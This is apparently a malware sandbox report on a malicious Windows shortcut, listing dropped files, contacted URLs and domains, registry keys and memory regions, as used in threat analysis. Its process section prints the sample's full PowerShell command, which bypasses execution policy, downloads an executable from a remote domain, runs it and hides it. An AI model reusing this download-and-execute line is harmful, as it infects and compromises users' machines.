Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Transfer.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
initial sample
|
 |
|
|
C:\Users\user\Desktop\Ojtjewi.exe
|
HTML document, ASCII text, with very long lines (394)
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gruninuq.ndh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5qhai2g.sd3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oizdqvvx.bdy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ori2zmb4.ciw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8ce9fb411935e3d1.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RNPH6GU10ND8Y05O39VP.temp
|
data
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidDEn Hiddden -Command OpenWith.exe;(new-object
System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe','Ojtjewi.exe');./'Ojtjewi.exe';(get-item
'Ojtjewi.exe').Attributes += 'Hidden';
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe
|
188.114.97.3
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrg
|
unknown
|
|
|
|
https://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
|
|
|
https://www.cloudflare.com/learning/access-management/phishing-attack/
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.sodiumlaurethsulfatedesyroyer.com
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://www.sodiumlaurethsulfatedesyroyer.com/ow
|
unknown
|
||
|
http://upx.sf.net
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.cloudflare.com/5xx-error-landing
|
unknown
|
||
|
http://www.microsoft.coj
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.sodiumlaurethsulfatedesyroyer.com
|
188.114.97.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.97.3
|
www.sodiumlaurethsulfatedesyroyer.com
|
European Union
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1DE154B0000
|
heap
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B941000
|
trusted library allocation
|
page read and write
|
||
|
1DE25601000
|
trusted library allocation
|
page read and write
|
||
|
1DE14FC0000
|
heap
|
page readonly
|
||
|
1DE2D600000
|
heap
|
page read and write
|
||
|
7FFD9B7AB000
|
trusted library allocation
|
page read and write
|
||
|
1DE2D8E7000
|
heap
|
page read and write
|
||
|
1DE155F0000
|
heap
|
page execute and read and write
|
||
|
1DE1582B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE25631000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1DE133C0000
|
heap
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC3000
|
trusted library allocation
|
page read and write
|
||
|
1DE135AE000
|
heap
|
page read and write
|
||
|
1DE2DCB0000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B8B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB83000
|
trusted library allocation
|
page read and write
|
||
|
1DE1358E000
|
heap
|
page read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
8D14A3C000
|
stack
|
page read and write
|
||
|
1DE2D634000
|
heap
|
page read and write
|
||
|
1DE134C0000
|
heap
|
page read and write
|
||
|
1DE15F74000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBF8000
|
trusted library allocation
|
page read and write
|
||
|
8D142FD000
|
stack
|
page read and write
|
||
|
1DE135E2000
|
heap
|
page read and write
|
||
|
1DE17081000
|
trusted library allocation
|
page read and write
|
||
|
8D145F7000
|
stack
|
page read and write
|
||
|
1DE16921000
|
trusted library allocation
|
page read and write
|
||
|
1DE15F5B000
|
trusted library allocation
|
page read and write
|
||
|
1DE2DA21000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1DE15F80000
|
trusted library allocation
|
page read and write
|
||
|
1DE13594000
|
heap
|
page read and write
|
||
|
1DE2D830000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
8D1437E000
|
stack
|
page read and write
|
||
|
1DE13600000
|
heap
|
page read and write
|
||
|
1DE2D660000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
1DE25675000
|
trusted library allocation
|
page read and write
|
||
|
8D14579000
|
stack
|
page read and write
|
||
|
8D1447E000
|
stack
|
page read and write
|
||
|
7FFD9B94A000
|
trusted library allocation
|
page read and write
|
||
|
1DE2D880000
|
heap
|
page read and write
|
||
|
1DE14FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
1DE134F0000
|
heap
|
page read and write
|
||
|
1DE16087000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B876000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE13576000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
1DE25621000
|
trusted library allocation
|
page read and write
|
||
|
8D13FCE000
|
stack
|
page read and write
|
||
|
8D14739000
|
stack
|
page read and write
|
||
|
7FFD9B972000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
1DE172DD000
|
trusted library allocation
|
page read and write
|
||
|
7DF4C3C40000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D144FE000
|
stack
|
page read and write
|
||
|
8D148BE000
|
stack
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7DF4C3C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE15601000
|
trusted library allocation
|
page read and write
|
||
|
8D146B6000
|
stack
|
page read and write
|
||
|
1DE2D870000
|
heap
|
page execute and read and write
|
||
|
1DE15F60000
|
trusted library allocation
|
page read and write
|
||
|
1DE2D67C000
|
heap
|
page read and write
|
||
|
7FFD9BC42000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE13725000
|
heap
|
page read and write
|
||
|
1DE13569000
|
heap
|
page read and write
|
||
|
1DE2D9E6000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
1DE17200000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAF8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B850000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE2D877000
|
heap
|
page execute and read and write
|
||
|
1DE2DA33000
|
heap
|
page read and write
|
||
|
1DE2D67A000
|
heap
|
page read and write
|
||
|
7FFD9BAE9000
|
trusted library allocation
|
page read and write
|
||
|
8D1558D000
|
stack
|
page read and write
|
||
|
1DE13720000
|
heap
|
page read and write
|
||
|
7FFD9BAFC000
|
trusted library allocation
|
page read and write
|
||
|
1DE2D6E8000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1DE258FC000
|
trusted library allocation
|
page read and write
|
||
|
1DE167B0000
|
trusted library allocation
|
page read and write
|
||
|
1DE2DA6D000
|
heap
|
page read and write
|
||
|
1DE15F84000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1DE2DA27000
|
heap
|
page read and write
|
||
|
1DE2D88E000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1DE175AE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
8D1550E000
|
stack
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
8D1548E000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1DE15095000
|
heap
|
page read and write
|
||
|
1DE2D9FE000
|
heap
|
page read and write
|
||
|
1DE2D903000
|
heap
|
page read and write
|
||
|
8D147BA000
|
stack
|
page read and write
|
||
|
8D143FB000
|
stack
|
page read and write
|
||
|
1DE2DA19000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
1DE13528000
|
heap
|
page read and write
|
||
|
1DE134A0000
|
heap
|
page read and write
|
||
|
7DF4C3C50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE15000000
|
trusted library allocation
|
page read and write
|
||
|
1DE15090000
|
heap
|
page read and write
|
||
|
1DE1737B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1DE2D637000
|
heap
|
page read and write
|
||
|
1DE2D93E000
|
heap
|
page read and write
|
||
|
1DE155D0000
|
heap
|
page execute and read and write
|
||
|
1DE2D9B2000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
1DE14FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1DE258EE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
|
1DE15D1D000
|
trusted library allocation
|
page read and write
|
||
|
1DE2D9F2000
|
heap
|
page read and write
|
||
|
1DE2D720000
|
heap
|
page read and write
|
||
|
8D1463E000
|
stack
|
page read and write
|
||
|
1DE15F72000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC44000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE16843000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
8D13EC6000
|
stack
|
page read and write
|
||
|
1DE1356E000
|
heap
|
page read and write
|
||
|
8D1493C000
|
stack
|
page read and write
|
||
|
1DE2D724000
|
heap
|
page read and write
|
||
|
1DE13630000
|
heap
|
page read and write
|
||
|
1DE2D8B4000
|
heap
|
page read and write
|
||
|
8D1483E000
|
stack
|
page read and write
|
||
|
8D1540E000
|
stack
|
page read and write
|
||
|
8D1427E000
|
stack
|
page read and write
|
||
|
1DE154CD000
|
heap
|
page read and write
|
||
|
1DE13598000
|
heap
|
page read and write
|
||
|
8D149BE000
|
stack
|
page read and write
|
||
|
1DE15F98000
|
trusted library allocation
|
page read and write
|
||
|
1DE15689000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
|
1DE15040000
|
trusted library allocation
|
page read and write
|
||
|
1DE16773000
|
trusted library allocation
|
page read and write
|
||
|
1DE17411000
|
trusted library allocation
|
page read and write
|
||
|
1DE2DA0D000
|
heap
|
page read and write
|
||
|
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE16C37000
|
trusted library allocation
|
page read and write
|
||
|
1DE258F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
8D13F4E000
|
stack
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
1DE13592000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1DE1735C000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE135D6000
|
heap
|
page read and write
|
||
|
1DE14F80000
|
trusted library allocation
|
page read and write
|
There are 174 hidden memdumps, click here to show them.